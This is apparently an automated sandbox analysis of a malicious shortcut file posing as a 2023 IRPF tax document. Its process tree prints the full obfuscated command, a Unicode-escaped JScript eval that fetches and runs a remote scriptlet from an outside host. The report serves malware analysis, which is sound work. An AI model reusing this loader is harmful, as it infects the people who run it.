Analysis

  • max time kernel
    29s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    06-06-2023 13:27

General

  • Target

    IRPF2023_R391071958.659826.33271.lnk

  • Size

    1KB

  • MD5

    e880916fd36e6e85d5779efeeca4477f

  • SHA1

    5f86fde948792f9705b160b85fef3b07c02d9076

  • SHA256

    b2fc287a710dfbb956fc580a3dda95bd6b42dc420c83b614e6e2aacddd6e4611

  • SHA512

    1705467998be98974d8d59ec7af0d917a1fc99357bc389a0a1aecb5c2ecfdc0a2df1cf343b99efcb709be4d92892763955e05fcd0c8a0fe71129af07b84c0ee5

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory (3 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\IRPF2023_R391071958.659826.33271.lnk
    (process tree depth 1, PID 1524)
    • Suspicious use of WriteProcessMemory
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\drtUPCO\>nul 2>&1 &&s^eT NQOZ=C:\drtUPCO\^drtUPCO.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0068\u0064\u0069\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0068\u0064\u0069\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0068\u0064\u0069\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0068\u0064\u0069\u002b\u0044\u0068\u0064\u0069\u002b\u0045\u0068\u0064\u0069\u002b\u0022\u002f\u002f\u0032\u0069\u0065\u0061\u0061\u006c\u002e\u0064\u006d\u0065\u0061\u0062\u0065\u006c\u0068\u0061\u0065\u006f\u006b\u0061\u006c\u0069\u006c\u006c\u0072\u0074\u0061\u007a\u0069\u006e\u0067\u002e\u007a\u0061\u002e\u0063\u006f\u006d\u002f\u003f\u0036\u002f\u0022\u0029\u003b'); >!NQOZ!&&ca^ll !NQOZ!"
      (process tree depth 2, PID 1060)

Network

MITRE ATT&CK Enterprise v6
